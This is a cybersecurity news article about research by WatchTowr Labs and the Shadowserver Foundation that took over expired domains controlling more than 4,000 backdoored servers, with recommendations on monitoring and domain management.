Over 4,000 Backdoors Controlled by Expired Domains: The Dangerous Reality of Digital Abandonment

A recent study conducted by WatchTowr Labs and the Shadowserver Foundation has highlighted a widely overlooked vulnerability: the use of expired domains in malware infrastructures and attack tools. In an effort to prevent their malicious reuse, researchers registered over 40 abandoned domains and successfully intercepted communication from more than 4,000 compromised systems worldwide, revealing the magnitude of the problem.

Digital Backdoors: A Persistent Threat

Backdoors or “web shells” are malicious tools implanted in compromised systems to provide unauthorized remote access to attackers. These tools allow the execution of commands, management of files, or even launching additional attacks against the affected system.

What’s most concerning is that many of these backdoors remain active for years, periodically connecting to domains previously configured by the attackers. When these domains expire, new opportunities arise for other actors (whether legitimate or not) to register them and take control of the backdoors.

The Study: Hijacking Backdoor Control

Researchers from WatchTowr Labs, in collaboration with Shadowserver, conducted an experiment aimed at exploring the implications of this abandoned infrastructure. They registered over 40 domains that previously controlled active backdoors and set up a logging system to monitor activity.

Surprising Results

After registering the domains, the compromised systems began to “report” automatically to the new controllers. The collected data revealed:

• More than 4,000 compromised systems attempting to connect.
• Backdoors on government servers in countries like China, Nigeria, and Bangladesh.
• Affected systems in universities in Thailand, South Korea, and China.

Among the identified tools were some notorious ones such as:

• r57shell and c99shell: known for their advanced functionality, including brute force, command execution, and file management.
• China Chopper: a popular tool among advanced persistent threat (APT) groups.

Implications of the Findings

The study highlights a key issue in modern cybersecurityCybersecurity solutions are essential in the modern era…: the lack of management of abandoned infrastructures by attackers. These abandoned backdoors could be easily reused by new cybercriminals to access previously compromised systems, all for the minimal cost of registering a domain.

Identified Issues

1. Reusable Infrastructure: Attackers can take advantage of the prior work of other hackers simply by registering expired domains.
2. Compromise of Sensitive Systems: The presence of backdoors on government and educational systems underscores the lack of effective controls on critical infrastructures.
3. Global Impact: Compromised systems are not limited to a single sector or region, demonstrating the widespread nature of this problem.

A Proactive Solution: The Role of Shadowserver

After identifying the compromised systems, WatchTowr handed over control of the registered domains to the Shadowserver Foundation. This nonprofit organization is dedicated to internet security and is currently “sinking” all traffic from the affected systems to its own servers, preventing them from falling back into malicious hands.

The Future of Cybersecurity and Abandoned Infrastructures

This case underscores the importance of responsibly managing digital infrastructures, even those used for malicious purposes. The reuse of expired domains not only poses risks for compromised systems but also reveals a lack of awareness about this issue.

Key Recommendations

1. Continuous Monitoring: Businesses and governments should conduct regular audits to identify potential backdoors and other vulnerabilities.
2. Domain Management: Ensure that previously used domains, even in security experiments, are properly managed to prevent their reuse.
3. Global Collaboration: Cooperation between organizations like WatchTowr and Shadowserver demonstrates the importance of working together to mitigate risks.

Conclusion

The discovery of more than 4,000 active backdoors connected to expired domains highlights a serious vulnerability in today’s digital security. This type of research emphasizes the need to address not only active threats but also infrastructures that, despite being abandoned, continue to pose significant risks. Proactive collaboration and responsible use of this data will be essential for strengthening global cybersecurity.

Source: WatchTowr and Bleeping Computer